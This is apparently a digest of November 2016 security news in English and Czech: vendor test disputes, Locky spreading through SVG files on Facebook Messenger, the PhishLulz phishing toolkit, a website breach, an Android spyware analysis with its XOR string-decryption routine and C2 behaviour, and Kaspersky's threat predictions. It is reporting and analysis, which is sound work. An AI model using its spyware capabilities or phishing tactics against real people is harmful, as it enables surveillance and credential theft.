It’s well-known already (to folks interested in IT security) how some cybersecurity vendors try to avoid open, public testing and comparisons with other products – so as not to expose their inadequacy. But by not taking part in such tests the marketing machinery of these vendors loses a crucial bit ton of leverage: all potential customers – mostly corporate ones – always consult independent tests run by dependable specialist organizations. So, what were they to do? A solution was found: to join up with other ‘next-gen’ developers to be tested together and separately (no ‘traditional AV’ allowed!), to hide behind a convenient methodology, and coat it all with the BS buzz term ‘next generation’.

Days after the testing the ‘next-gen’ participants published their own interpretations of the results based on dubious logical deduction, manipulation of figures, and biased marketing rhetoric. And you guessed it – those interpretations brought them all to the same conclusion, that ~ “here, finally, it’s been publicly proven how next-gen reigns supreme over traditional products”!

Really? Ok, time we turned on the Babel fish…

Is it really true that next-gen products are great? And if so great… – great compared to what? Let’s compare the results of the ‘next-gen’ test with the above-mentioned twin-test – i.e., the same test (using the exact same methodology), only with different (non ‘next-gen’) participating products.

Important: the true quality of protection should be judged by the figure outside the brackets that corresponds to protection rate, not detection rate, since there’s no point in just detecting attacks but still then letting them take place, i.e., not stopping them.

Protection from malware in different scenarios and false positives:


Protection against exploits:


Well, I can hear how the clanging of medals in the next-generation camp seems to have come to a sudden halt, while their ‘victorious’ self-published reports can now be seen for what they really are: mere attempts to intentionally deceive users ‘in the best traditions of misleading test marketing‘.

Judge for yourself:

One participant in its press release appears to have forgotten to tell anyone about its bombing on protection from exploits (28%), while also seeming to have switched its results on the protection rate in the WPDT scenario (100% instead of 98%).

Another participant also kept quiet about its modest result on protection from exploits (82%), but proudly called its… last-but-one place in the contest in this category as “…outperform[ing] other endpoint security competitors in exploit protection”. It also preferred not to mention its coming last in the AVC scenario test, but that didn’t stop it claiming that mythical ‘legacy AV’ (whatever that is) simply MUST be replaced by its products.

A third participant decided to get straight to the point by laying claim to the crown of the ‘most next-gen of all’, having received, nothing short of a blessing certification from this test lab to replace mythical ‘legacy AV’ with its next-gen products:


The Babel fish has a few other questions regarding this test.

The methodology used this time for testing protection against malicious programs was simpler than that used in the regular full-fledged Real World Protection Test by which other (non-‘next-gen’) products are normally certified. In the Real World Protection Test, each month for a year six times more real cyberattack scenarios (WPDT) are used. And even adding RTTL and AVC scenarios doesn’t make up for this simplification.

So why was simplification of the methodology and a division of the participants (into ‘next-gen’ and ‘business’) needed? Was it an indulgence to the next-gen vendors, which were afraid of flopping big-time on regular tests? How well would these developers do in a full-fledged test together with the technological leaders?

And the last question: what is ‘next generation’?

According to a comprehensive study by the SANS Institute conducted at the request of another self-proclaimed ‘next-gen’ vendor, the category ‘Next-generation AV’ covers all large vendors of cybersecurity solutions. Moreover, many ‘next-gen’ vendors do not qualify for the ‘Next-generation AV’ tag – especially when it comes to the level of effectiveness and protection from zero-day threats:


I can’t say that I fully agree with above mentioned definition: absent from it are such important things as multi-level protection, adaptability, and the ability to not only detect but also prevent, react to and predict cyberattacks, which are all much more important for the user. However, even this definition unequivocally states that all products need to be tested as per one and the same methodology.



First, (in spite of everything): I want to express my thanks to AV-Comparatives for finally being able to conduct a public test of several ‘next-gen’ products. Ok, so the methodology used was WPDT-lite, and the test results can’t be used to directly compare participants. Still, as they say, you can’t have everything straight away – or – the first step is always the most difficult/crucial: the main thing is that ‘next-gen’ has finally been publically tested by an authoritative independent lab, which is just what we’d been wanting for a long time.

Second: I hope that other independent test labs will follow AV-Comparatives’ example in testing ‘next-gen’ – preferably as per AMTSO standards – and, crucially, together with all vendors. And I hope the vendors in turn, won’t throw obstacles in the test labs’ way.

Third: When choosing a cybersecurity solution it’s necessary to take into account as many different tests as possible. Reliable products set themselves apart by constantly notching up stable top results in different tests by different independent labs over many years.

And finally: Now, in the nick of time for the planning of budgets for next year, I hope ‘next-gen’ developers will allocate more resources to the development of technologies and participation in public tests, rather than on fancy advertising billboards, planned inaccuracies in press-releases, and expensive parties stuffed with celebrities.

‘Next-gen’ security products manipulate public tests

PS – from Babel fish:

“The word combination ‘next-generation security’ and its derivations in public communications – be they marketing material, advertising videos, white papers, or the arguments of a sales manager – can be a sign of aggressive telepathic matrixes directed at the promotion of pure BS, and thus necessitate a particularly astringent practical application of critical reason.”

Pozor, Facebook Messenger napadla škodná. Šíří se v obrázku s příponou SVG
21.11.2016 Živě.cz
Sociální sítě
Prostřednictvím Messengeru na Facebooku se šíří škodlivý skript. Tváří se jako obrázek s příponou SVG a postupně se šíří bez vědomí uživatelů. Pokud vám od nějakého známého podezřelá zpráva s takovým obrázkem přišla, neklikejte na něj.

Útočníci obejdou i autorizační SMS z banky. Stačí jim k tomu Facebook
SVG je formát souboru, který popisuje vektorovou grafiku prostřednictvím XML. Je to otevřený vektorový formát, který se běžně využívá pro vykreslení 2D grafiky na webu. Je úsporný a oproti rastrovým formátům (JPEG, GIF) může přizpůsobovat velikost bez ztráty kvality zobrazení. Namísto informací o jednotlivých pixelech totiž obsahuje kód, který popisuje objekty a jejich vlastnosti. O korektní zobrazení v jakékoli velikosti už se pak postará prohlížeč.

Klepněte pro větší obrázek
Nejdřív jen obrázek s názvem photo_***.svg a poté už jen omluva od napadeného uživatele

V aktuálním případě se však stalo, že je do kódu SVG souboru vměstnán skript, který volá další externí kód. V mobilním telefonu vyvolá nabídku falešné aktualizace, v počítači odkáže na falešnou stránku působící jako kopie YouTube, která vnucuje instalaci doplňku do prohlížeče. Vždy je cílem dostat do telefonu či počítače malware. Podle stávajících zjištění zajišťuje především další šíření skriptu mezi facebookovými přáteli. Možnosti zneužití jsou ale nemalé.

Pokud podobnou zprávu dostanete, neklikejte na ni a jen upozorněte toho, kdo vám ji poslal. Klidně odpovědí přes Messenger, nic vám nehrozí.

Když někdo naopak upozorní vás, že mu posíláte podivnou zprávu s obrázkem SVG, odpojte od facebookového účtu všechny navázané aplikace, vymažte cookies a mezipaměť prohlížeče (Ctrl+Shift+Del), změňte si heslo a pečlivě si zkontrolujte i aplikace instalované ve svém mobilním telefonu či tabletu. Neznámé či nepoužívané odinstalujte. Pro jistotu si pak zkontrolujte počítač antivirovým nástrojem, ať už vestavěným Defenderem ve Windows anebo nějakým externím.

CrySis už nestraší. Bezpečnostní experti vyzráli na další vyděračský virus

21.11.2016 Novinky/Bezpečnost Viry
S dalším vyděračským virem zatočili bezpečnostní experti ze společnosti Kaspersky Lab. Tentokrát se jim podařilo vyzrát na škodlivý kód zvaný CrySis, který dokázal napadené stroje uzamknout a za odemčení požadoval výkupné. Upozornil na to server Security Affairs.
Výzkumníci využili toho, že se na webu objevily dešifrovací klíče ke zmiňovanému záškodníkovi z rodiny ransomware – tak jsou souhrnně označovány všechny vyděračské viry.

Implementovali je proto do nástroje zvaného Rakhni decryptor, prostřednictvím kterého nyní mohou lidé uzamčené počítače odemknout a zablokovaná data opět zpřístupnit. Nástroj je možné stahovat zdarma na stránkách tvůrců, k dispozici je však pouze v anglické mutaci.

Scénář útoku jako přes kopírák
Útok nezvaného návštěvníka CrySis probíhá podle stejného scénáře jako u dalších vyděračských virů. Nejprve tedy tento záškodník zašifruje všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.

Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení výkupného. Ani pak se nicméně uživatelé ke svým datům nemusejí dostat.

Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné. V případě CrySisu to však již neplatí. Podobně bezpečnostní experti již dříve vyzráli na škodlivý kód zvaný Polyglot. Ve hře jsou miliardy
Sluší se nicméně podotknout, že škodlivé kódy z rodiny ransomware představují pro uživatele stále velké riziko. Různě upravených verzí totiž existují podle nejstřízlivějších odhadů desítky, spíše však stovky. A kyberzločinci se je snaží nasazovat při drtivé většině útoků.

Tak velké popularitě se vyděračské viry těší především proto, že jsou pro piráty velmi výhodným byznysem. Podle odhadů amerického Federálního úřadu pro vyšetřování (FBI) jeden konkrétní škodlivý virus vydělal počítačovým pirátům miliardy.

Počítačoví piráti si měli přijít na velké peníze díky škodlivému kódu zvanému TeslaCrypt. Jen za první čtvrtletí letošního roku jim tento nezvaný návštěvník vydělal podle odhadů FBI více než 200 miliónů dolarů, tedy v přepočtu bezmála pět miliard korun.

Watch out, Locky ransomware spread via SVG images on Facebook Messenger
21.11.2016 securityaffairs Virus

Researchers have discovered a new hacking campaign leveraging on Facebook Messenger to spread the Locky ransomware via SVG images.
The Locky Ransomware is spread via a downloader, experts noticed that it is able to bypass Facebook defense measures by pretending to be a harmless image file.

The campaign was first spotted during the weekend by the malware expert Bart Blaze and by the researchers Peter Kruse.

“Earlier today, a friend of mine notified me of something strange going on with his Facebook account; a message containing only an image (an .svg file in reality) had been sent automatically, effectively bypassing Facebook’s file extension filter:” wrote Bart Blaze in a blog post.

SVG images facebook-locky-ransomware

The SVG image file could be used by attackers as a sort of container that can include a malicious code such as a Java Script.

In May 2015, researchers at the AppRiver security firm discovered a malicious campaign that was distributing a strain of ransomware by exploiting SVG files.

The SVG (Scalable Vector Graphics) is an XML-based vector image format for two-dimensional graphics with support for animation and interactivity. The SVG images include the definition of their behaviors in XML text files, this feature makes possible SVG image can be searched, indexed, scripted, and compressed. Despite SVG images can be created and edited with any text editor, more often they are created directly with a software that elaborates the images.

The experts at AppRiver noticed that threat actors in the wild were exploiting a small JavaScript entry contained in the SVG files that allow them to redirect victims to a website used to serve the Cryptowall malware.

“These SVG files however contained a small javascript entry that would open a webpage to download some malware.” AppRiver researchers said in a blog post. “The IP link in question ends up forwarding to another domain where a zip is downloaded of the actual exe payload. It didn’t auto execute, user interaction would still be needed for that. “

Back to the present, the new attack leverages a downloader called Nemucod that is spread via Facebook Messenger as a .svg file, as confirmed by Peter Kruse via Twitter.
Visualizza l'immagine su Twitter
peterkruse @peterkruse
Confirmed! #Locky spreading on #Facebook through #Nemucod camouflaged as .svg file. Bypasses FB file whitelist. …
20:04 - 20 Nov 2016
159 159 Re 69 69 Mi piace
When the victim accesses the malicious SVG file it will be directed to a website that appears to be YouTube in design only, but once the page is loaded, the victim is asked to install a codec in order to play the video that is shown on the page.

“A website purporting to be Youtube, wih a video from Facebook – of course, you needed to install an additional extension to view it :)” continues Bart Blaze.

If the victim installs the Chrome extension as requested on the page, the attack is this spread further via Facebook Messenger. The experts observed that sometimes the malicious Chrome extension installs the Nemucod downloader, which launches the Locky ransomware attack.

The experts warn of several variants of the attack and likely several malicious extensions used to spread malware like the Locky Ransomware.

“Currently, I’m not exactly sure what this extension is supposed to do beside spreading itself automatically via Facebook, but likely it downloads other malware to your machine.” Blaze added in the post.

If you get infected remove asap the malicious extension from your browser.

Security expert presented a PhishLulz tool for professional phishing pen test
21.11.2016 securityaffairs Phishing

The security expert Michele Orru from FortConsult has released an automated phishing toolkit dubbed ‘PhishLulz’ for penetration testing activities.
The security expert Michele Orru from FortConsult, aka @antisnatchor, has released an automated phishing toolkit dubbed ‘PhishLulz’ for penetration testing activities. The PhishLulz tool was presented at the Kiwicon hacking event held Wellington New Zealand last week.

PhishLulz is a tool written in Ruby, it leverages Amazon EC2 cloud instances for its phishing campaigns. The toolkit provides a GUI from the PhishingFrenzy kit and combines it with the Browser Exploitation Framework Project (BeEF).

The tool also includes a self-signed certificate authority and new phishing templates that could be used by penetration testers fro their analysis, Orry also announced as a future improvement the automatic domain registration capability that in the current version is limited to registrar NameCheap.

The toolkit allows an attacker to easily compose efficient phishing campaigns, it is quite easy to compose malicious messages that appear as legitimate. The tools will promptly alert the attacker when a victim takes the bait. The BeEF allows the PhishLulz is also able to and send exploits and gather user target configuration information such as the operating system, browser versions, and running applications.

The tool includes MailBoxBug and also works with Office365 accounts to send out phishing messages.

Orru presented the results of the tests conducted an unnamed Australian Government agency, PhishLulz has deceived 40 percent of its staff who revealed corporate VPN credentials.

“I was in Poland, and they were in Australia, so I had to send the emails at the right time,” Orru told the hacking conference.
“With five minutes to run the PhishLulz VM, five minutes to start modify the template and upload the certificates you need, you’re ready to go.”

Orru provided interesting insights on phishing campaigns, for example, attackers will have an hour to exploit the dozen or so logins they receive before the victims will notice the attack and revoke them.

Another info shared by the expert during the presentation is related to the best times to launch phishing campaigns, the emails sent in the morning or just after the lunch have a greater likelihood to trick victims into providing sensitive data.

The experts highlighted that employees often fail to distinguish dots from dashes in the URLs.

Eastern India Regional Council hacked by Kapustkiy

21.11.2016 securityaffairs Hacking

Kapustkiy, one of the most prolific hackers at this moment announced a new data breach, the victim is the India Regional Council.
Last week, I was contacted by a young hacker that breached Indian embassies across the worlds, he goes online with the moniker Kapustkiy.

Kapustkiy is a seventeen years old pentester that is targeting organizations and embassies across the world. Recently he breached the ‘Dipartimento della Funzione Pubblica’ Office of the Italian Government, the Paraguay Embassy of Taiwan (, and a few days ago the hacker and his friend Kasimierz (@Kasimierz_) hacked the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya. Kapustkiy and his friend Kasimierz (@Kasimierz_).

He also targeted Universities, including two subdomains of Virginia University & Sub domain of University of Wisconsin ( ) and another embassy, the Indian Embassy in New York ( )

The Indian authorities have issued a public statement to thank the young hacker for exposing the vulnerabilities in their websites.

“Thank you for your advice,” said Sanjay Kumar Verma, Joint Secretary, eGovernance and Information Technology. “We are fixing codes one by one. Your help in probing websites of various Indian embassies is a great help.”

This time the young hacker breached the database at the Eastern India Regional Council and leaked online a small portion of the archive composed of 17,000 users. Kapustkiy leaked an excel file containing more than 2000 user records as proof of the breach.

 India Regional Council breach

The records in the database of Eastern India Regional Council contain many attributes, including membership numbers, usernames, passwords, email addresses, registration numbers.

Kapustkiy used some web scanners to find several vulnerabilities in the target website and a simple SQL Injection tool to exploit the flaw he discovered. The hacker tried to contact the organization but they seem to ignore emails.

Once again Kapustkiy is inviting website administrators to pay attention to the security of their infrastructure.

An Android Spyware revealed the existence of a new Italian surveillance firm
21.11.2016 securityaffairs Android

A strain of Android spyware recently analyzed by security experts from RedNaga Security team points to an another Italian company.
A new strain of Android malware reveals the existence of a new Italian player in the surveillance landscape. The Android spyware was analyzed by researchers from the RedNaga Security team, that is a first time investigated the possibility of a new threat developed by the notorious surveillance firm Hacking Team. The analysis revealed that another Italian company developed the dangerous Android spyware.

The Researcher Tim Strazzere and his colleagues analyzed a sample of the malware that infected a machine of an anonymous target, likely a government organization.

The Android implants implements the common functionalities of most spyware:

Automatically remove itself from the launcher after the first execution
Kick start it’s own MainService and set an alarm to keep it persistent
Stop processing commands from the C2 or doing work if the user is present
Mute all audio on the device
Turn GPS on or off
Query internal phone URIs for data and write to external media for later exfiltration
Create screenshots or record the screen
Record video and audio
Respond to specifically configured SMS numbers that include 873451679TRW68IO and reply or forward messages with device information
Execute code (“actions”) from downloaded .dex files (mainly for rooting different devices)
Asks for practically every permission
Can hide itself from the launcher, ensure persistence, mute all audio on the device, turn the GPS on and off, take screenshots or record what can be seen on the screen, record video and audio, reply to or forward messages, lay low while the user is using the device, executed code, exfiltrate data, and so on.
Likely masquerades as an update for a Google service, as the target is shown phrases such as “Servizi Google” (Google Service) and “Aggiornamento effettuato con successo” (Successful Update).
The experts noticed that the Android spyware was contacting two IP addresses belonging to the address space used in the past by the HackingTeam. This circumstance, alongside with the use of Italian string in the code suggests the involvement of an Italian threat actor.

The code was examined by two former Hacking Team employees and Citizen Lab researcher Bill Marczak and both groups excluded the HT authorship.

“The sample has nothing to do with Hacking Team,” another source told Lorenzo Bicchierai from Motherboard. “It’s structurally different from the ones attributed to Hacking Team and doesn’t share any part of the code.”

Guido Landi @k_sOSe
It doesn't really look like an HT implant.. …
06:11 - 15 Nov 2016
Re 2 2 Mi piace
Who developed the Android Spyware?

A reference in the SSL certificate used by one of the servers contains a string that might point to the author of the malware, “Raxir”.


Raxir is the name of an Italian company launched in 2013 and located at the incubator “Citta’ Della Scienza” in Naples, Italy.

The company develops software for investigations and works with Italian law enforcement providing forensic services.

Marczak scanned the Internet for evidence of Raxir infections and related traces and found another server that exposes a digital certificate containing the string: “ProcuraNapoliRaxirSrv.”

“The Procura” is the office of the prosecutor and Napoli is a popular city in the South of Italy. It is likely that this office is one of the customers of the Raxir firm.

Let me close with the opinion of the cyber security expert Antonio Cocomazzi who reviewed the portion of codes reported in the analysis published by the Rednaga Security Team.

android spyware

About the section “Android Manifest”

As the author said, this manifesto has a really suspicious import of the permissions like READ_CONTACTS, CAMERA, SEND_SMS, RECEIVE_SMS, etc. that is common to a malware behavior.
The most interesting Observable is that the malware author tries to trick also the reverse engineer calling the activity label “Aggiornamento software” that is “Software update” in Italian.

About the section “String Encryption”











def decrypt(encrypted, mod):
if not encrypted or not mod:

return ”

mod = mod – 0x5

out = ”

for char in list(encrypted):

out = ‘%s%s’ % (out, unichr(ord(char) ^ (mod & 0x5F)))

mod = (mod – 0xB)

return out.encode(‘ascii’, ‘replace’).encode(‘UTF-32’)

To decrypt the strings embedded into the apk they use a classic XOR Cipher with a little variant: a modifier passed as an argument.
Of course, if the malware contains a function do decrypt the strings, it means that strings were encrypted into the malware to complicate the reverse engineer analysis.
How is used that modifier?
This is a function that can decrypt the data with a dynamic XOR key (thanks to modifier passed as an argument).
That means, most probably, the xor encryption of the string is done with a dynamic XOR key.
This complicate the reverse engineer analysis because in that way the malware writer doesn’t hardcode the xor key in a statical way and, for example, he can let the malware download from a C2 Server.
Anyway, this key could be bruteforced, in fact the author of this article wrote a IDA Pro script to automate the key bruteforcing process, it’s called that you can find in the section below.

Dig deep into the code we can see that function accept 2 arguments: “encrypted”, the encrypted string to decrypt and the “mod”, in order to generate at every run of the malware different XORing encryption.
After a first check of the arguments (line 2), then it modifies the modifier subtracting a constant value 0x5 (5 in decimal).
In the line 7, it loops through every character of the encrypted string, in that cycle, it performs the decryption steps of every character.
This is done in the line 8 appending each new decrypted char to the variable “out” (that will be the final decrypted string).
The encryption of the char is represented by the following formula: “unichr(ord(char) ^ (mod & 0x5F))” so the ord() function returns an integer if you pass as argument a Unicode char, the result of that computation will be XORed (^ operator) with the modifier ANDed (& operator) with a constant value 0x5F (95 decimal).
The result of that computation will be an integer number, so it needs to cast it back to a Unicode char. This is done with the unichr() function.
Before the loop cycle continue, it changes the modifier subtracting 0xB (11 in decimal) from it.
In the end (line 10) it sets the right string encoding to the variable “out”.

About the section “Appendix: Captured C2 Interactions”

Looking at the appendix captured C2 interactions we can immediately realize that the server answer for some action requested by the client (the infected phone).
Unfortunately, we don’t have a .pcap file containing all the request done through Internet, but as we can guess, maybe the malware asks for the malicious action to perform (RequestActionsToExecute) in order to exfiltrate data and the server should answer. That answer should be handled by the malware in order to perform all the steps to grap the data.
Surprisingly, it seems the malware author manages also a way to receive the confirmation if the malware received the action correctly. (AckRequestedActions)

The request to UploadService page is a concrete data exfiltration action in which the malware compresses the data (with PKZip) and send it to the server.
We can guess, thanks to the parameter passed through the POST request “encrypted blob” that file will be stored in a database field instead of implementing a module to upload the file physically on the server.

The NotifyLog request seems to be a way to manage and debug strange behaviors generated by the infected device.


Below a few considerations:

The Italian “Procura” offices investigate crimes and it is strange that the sample of the Raxis Android spyware infected the mobile device of a Government representative.
Did the malware go out of control?
It seems very strange.
Another possibility is that for some reason, the malware was used by a different government entity.

Special Thanks to Odisseus who supported me in the analysis of the events.

Odisseus is an Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing, and development.


iPhone zálohuje historii hovorů do iCloudu bez vědomí uživatele a nejde to vypnout
Ruská společnost Elcomsoft, která mimo jiné vyvíjí a prodává software pro crackování mobilů, zjistila, že Apple zálohuje historii hovorů, aniž by o tom uživatel věděl nebo mohl tuto funkci vypnout. V iCloudu jsou uloženy logy za poslední čtyři měsíce a slouží k tomu, aby se synchronizovaly napříč zařízeními.

Elcomsoft Phone Viewer umí záznamy z iCloudu stáhnout
Problém je, že uživatel nad funkcí nemá kontrolu. Zálohování funguje automaticky po přihlášení k Apple ID. Nepomůže vypnout zálohování do iCloudu ani se odpojit od Wi-Fi. Logy se pošlou přes mobilní síť a trvá to vždy maximálně v řádu hodin. Uchovávají se jen metadata, tedy informace, kdo s kým volal, kdy a jak dlouho. Samotný hovor nikoliv.

Podle Elcomsoftu se zálohují nejen hovory z mobilní sítě, ale také ty přes FaceTime nebo jiné služby, které využívají nové VoIP rozhraní CallKit v iOS 10. Jde o WhatsApp, Skype nebo Viber. Logy lze z iCloudu stáhnout (Elcomsoft už na to vytvořil nástroj) a uživatel se přitom vůbec nedozví, že si zálohu někdo stáhl. Řešení je úplně deaktivovat iCloud, ale tím se uživatel připraví o všechny užitečné výhody, které tato služba poskytuje.

Apple k tomu dodává, že veškerá data jsou šifrovaná jak po cestě na servery, tak i na samotných serverech. Pokud tedy v řetězci neudělal nějakou skulinku, logy si stejně přečte jen ten, kdo zná klíč (tj. uživatel). To je fér, byť možnost ruční vypnutí by utišila i ty největší paranoiky.

PS: Stejná metadata u nás musejí uchovávat i operátoři, a to po dobu minimálně šesti měsíců. Dostanou se pochopitelně ale jen k mobilním hovorů, ne těm z aplikací třetích stran.

Kaspersky Security Bulletin. Predictions for 2017

19.11.2016 Kaspersky Cyber

Yet another year has flown past and, as far as notable infosec happenings are concerned, this is one for the history books. Drama, intrigue and exploits have plagued 2016 and, as we take stock of some of the more noteworthy stories, we once again cast our gaze forward to glean the shapes of the 2017 threat landscape. Rather than thinly-veiled vendor pitching, we hope to ground these predictions in trends we’ve observed in the course of our research and provide thought-provoking observations for researchers and visitors to the threat intelligence space alike.

Kaspersky Security Bulletin. Predictions for 2017

Our record

Last year’s predictions fared well, with some coming to fruition ahead of schedule. In case you didn’t commit these to memory, some of the more notable predictions included:

APTs: We anticipated a decreased emphasis on persistence as well as an increased propensity to hide in plain sight by employing commodity malware in targeted attacks. We’ve seen this, both with an increase in memory or fileless malware as well as through the myriad reported targeted attacks on activists and companies, which relied on off-the-shelf malware like NJRat and Alienspy/Adwind.

Ransomware: 2016 can be declared the year of ransomware. Financial malware aimed at victimizing users has practically been galvanized into a ransomware-only space, with the more effective extortion scheme cannibalizing malware development resources from less profitable attempts at victimizing users.

Forecast for 2017: time to start using Yara rules more extensively as IoCs become less effective

More Bank Heists: When we considered the looming expansion of financial crime at the highest level, our hypothetical included targeting institutions like the stock exchange. But it was the attacks on the SWIFT network that brought these predictions to bear, with millions walking out the door thanks to crafty, well-placed malware.

Internet Attacks: Most recently, the oft-ignored world of sub-standard Internet-connected devices finally came to bear on our lives in the form of a nasty IoT botnet that caused outages for major Internet services, and hiccups for those relying on a specific DNS provider.

Shame: Shame and extortion have continued to great fanfare as strategic and indiscriminate dumps have caused personal, reputational, and political problems left and right. We must admit that the scale and victims of some of these leaks have been genuinely astonishing to us.

Kaspersky Security Bulletin. Predictions for 2017

What does 2017 have in store?

Those dreaded APTs

The rise of bespoke and passive implants

As hard as it is to get companies and large-scale enterprises to adopt protective measures, we also need to admit when these measures start to wear thin, fray, or fail. Indicators of Compromise (IoCs) are a great way to share traits of already known malware, such as hashes, domains, or execution traits that will allow defenders to recognize an active infection. However, the trendsetting one-percenters of the cyberespionage game have known to defend against these generalized measures, as showcased by the recent ProjectSauron APT, a truly bespoke malware platform whose every feature was altered to fit each victim and thus would not serve to help defenders detect any other infections. That is not to say that defenders are entirely without recourse but it’s time to push for the wider adoption of good Yara rules that allow us to both scan far-and-wide across an enterprise, inspect and identify traits in binaries at rest, and scan memory for fragments of known attacks.

Forecast for 2017: passive implants showing almost no signs of infection come into fashion

ProjectSauron also showcased another sophisticated trait we expect to see on the rise, that of the ‘passive implant’. A network-driven backdoor, present in memory or as a backdoored driver in an internet gateway or internet-facing server, silently awaiting magic bytes to awaken its functionality. Until woken by its masters, passive implants will present little or no outward indication of an active infection, and are thus least likely to be found by anyone except the most paranoid of defenders, or as part of a wider incident response scenario. Keep in mind that these implants have no predefined command-and-control infrastructure to correlate and provide a more anonymous beachhead. Thus, this is the tool of choice for the most cautious attackers, who must ensure a way into a target network at a moment’s notice.

Kaspersky Security Bulletin. Predictions for 2017

Ephemeral infections

While adoption of PowerShell has risen as a dream tool for Windows administrators, it has also proven fruitful ground for the gamut of malware developers looking for stealthy deployment, lateral movement, and reconnaissance capabilities unlikely to be logged by standard configurations. Tiny PowerShell malware stored in memory or in the registry is likely to have a field day on modern Windows systems. Taking this further, we expect to see ephemeral infections: memory-resident malware intended for general reconnaissance and credential collection with no interest in persistence. In highly sensitive environments, stealthy attackers may be satisfied to operate until a reboot wipes their infection from memory if it means avoiding all suspicion or potential operational loss from the discovery of their malware by defenders and researchers. Ephemeral infections will highlight the need for proactive and sophisticated heuristics in advanced anti-malware solutions (see: System Watcher).

Kaspersky Security Bulletin. Predictions for 2017

Espionage goes mobile

Multiple threat actors have employed mobile implants in the past, including Sofacy, RedOctober and CloudAtlas, as well as customers of HackingTeam and the suspected NSO Pegasus iOS malware suite. However, these have supplemented campaigns largely based on desktop toolkits. As adoption of Desktop OS’s suffers from a lack of enthusiasm, and as more of the average user’s digital life is effectively transferred to their pockets, we expect to see the rise of primarily mobile espionage campaigns. These will surely benefit from decreased attention and the difficulty of attaining forensic tools for the latest mobile operating systems. Confidence in codesigning and integrity checks has stagnated visibility for security researchers in the mobile arena, but this won’t dissuade determined and well-resourced attackers from hunting their targets in this space.

Kaspersky Security Bulletin. Predictions for 2017

The future of financial attacks

We heard you’d like to rob a bank…

The announcement of this year’s attacks on the SWIFT network caused uproar throughout the financial services industry due to its sheer daring; measured in zeros and commas to the tune of multi-million dollar heists. This move was a natural evolution for players like the Carbanak gang and perhaps other interesting threat actors. However, these cases remain the work of APT-style actors with a certain panache and established capability. Surely, they’re not the only ones interested in robbing a bank for sizable funds?

Forecast for 2017: growing popularity of short-lived infections, including those using PowerShell

As cybercriminal interest grows, we expect to see the rise of the SWIFT-heist middlemen in the well-established underground scheme of tiered criminal enterprises. Performing one of these heists requires initial access, specialized software, patience, and, eventually, a money laundering scheme. Each of these steps has a place for already established criminals to provide their services at a fee, with the missing piece being the specialized malware for performing SWIFT attacks. We expect to see the commodification of these attacks through specialized resources being offered for sale in underground forums or through as-a-service schemes.

Kaspersky Security Bulletin. Predictions for 2017

Resilient payment systems

As payment systems became increasingly popular and widely adopted, we expected to see greater criminal interest in these. However, it appears that implementations have proven particularly resilient, and no major attacks have been noted at this time. This relief for the consumer may, however, entail a headache for the payment system providers themselves, as cybercriminals are wont to target the latter through direct attacks on the payment system infrastructure. Whether these attacks will result in direct financial losses or simply outages and disruption, we expect increased adoption to attract more nefarious attention.

Kaspersky Security Bulletin. Predictions for 2017

Dirty, lying ransomware

As much as we all hate ransomware (and with good reason), most ransomware thrives on the benefit of an unlikely trust relationship between the victim and their attacker. This criminal ecosystem relies on the tenet that the attacker will abide by a tacit contract with the victim that, once payment is received, the ransomed files will be returned. Cybercriminals have exhibited a surprising semblance of professionalism in fulfilling this promise and this has allowed the ecosystem to thrive. However, as the popularity continues to rise and a lesser grade of criminal decides to enter the space, we are likely to encounter more and more ‘ransomware’ that lacks the quality assurance or general coding capability to actually uphold this promise.

We expect ‘skiddie’ ransomware to lock away files or system access or simply delete the files, trick the victim into paying the ransom, and provide nothing in return. At that point, little will distinguish ransomware from wiping attacks and we expect the ransomware ecosystem to feel the effects of a ‘crisis of confidence’. This may not deter larger, more professional outfits from continuing their extortion campaigns, but it may galvanize forces against the rising ransomware epidemic into abandoning hope for the idea that ‘just pay the ransom’ is viable advice for victims.

Kaspersky Security Bulletin. Predictions for 2017

The big red button

The famous Stuxnet may have opened a Pandora’s Box by realizing the potential for targeting industrial systems, but it was carefully designed with a watchful eye towards prolonged sabotage on very specific targets. Even as the infection spread globally, checks on the payload limited collateral damage and no industrial Armageddon came to pass. Since then, however, any rumor or reporting of an industrial accident or unexplained explosion will serve as a peg to pin a cyber-sabotage theory on.

Forecast for 2017: espionage increasingly shifting to mobile platforms

That said, a cyber-sabotage induced industrial accident is certainly not beyond the realm of possibility. As critical infrastructure and manufacturing systems continue to remain connected to the internet, often with little or no protection, these tantalizing targets are bound to whet the appetite of well-resourced attackers looking to cause mayhem. It’s important to note that, alarmism aside, these attacks are likely to require certain skills and intent. An unfolding cyber-sabotage attack is likely to come hand-in-hand with rising geopolitical tensions and well-established threat actors intent on targeted destruction or the disruption of essential services.

Kaspersky Security Bulletin. Predictions for 2017

The overcrowded internet bites back

A brick by any other name

Long have we prophesied that the weak security of the Internet of Things (or Threats) will come back to bite us, and behold, the day is here. As the Mirai botnet showcased recently, weak security in needlessly internet-enabled devices provides an opportunity for miscreants to cause mayhem with little or no accountability. While this is no surprise to the infosec-aficionados, the next step may prove particularly interesting, as we predict vigilante hackers may take matters into their own hands.

Forecast for 2017: use of intermediaries in attacks against the SWIFT interbank messaging system

The notion of patching known and reported vulnerabilities holds a certain sacrosanct stature as validation for the hard (and often uncompensated) work of security researchers. As IoT-device manufacturers continue to pump out unsecured devices that cause wide-scale problems, vigilante hackers are likely to take matters into their own hands. And what better way than to return the headache to the manufacturers themselves by mass bricking these vulnerable devices? As IoT botnets continue to cause DDoS and spam distribution headaches, the ecosystem’s immune response may very well take to disabling these devices altogether, to the chagrin of consumers and manufacturers alike. The Internet of Bricks may very well be upon us.

Kaspersky Security Bulletin. Predictions for 2017

The silent blinky boxes

The shocking release of the ShadowBrokers dump included a wealth of working exploits for multiple, major manufacturers’ firewalls. Reports of exploitation in-the-wild followed not long after as the manufacturers scrambled to understand the vulnerabilities exploited and issue patches. However, the extent of the fallout has yet to be accounted for. What were attackers able to gain with these exploits on hand? What sort of implants may lie dormant in vulnerable devices?

Looking beyond these particular exploits (and keeping in mind the late 2015 discovery of a backdoor in Juniper’s ScreenOS), there’s a larger issue of device integrity that bears further research when it comes to appliances critical to enterprise perimeters. The open question remains, ‘who’s your firewall working for?’

Kaspersky Security Bulletin. Predictions for 2017

Who the hell are you?

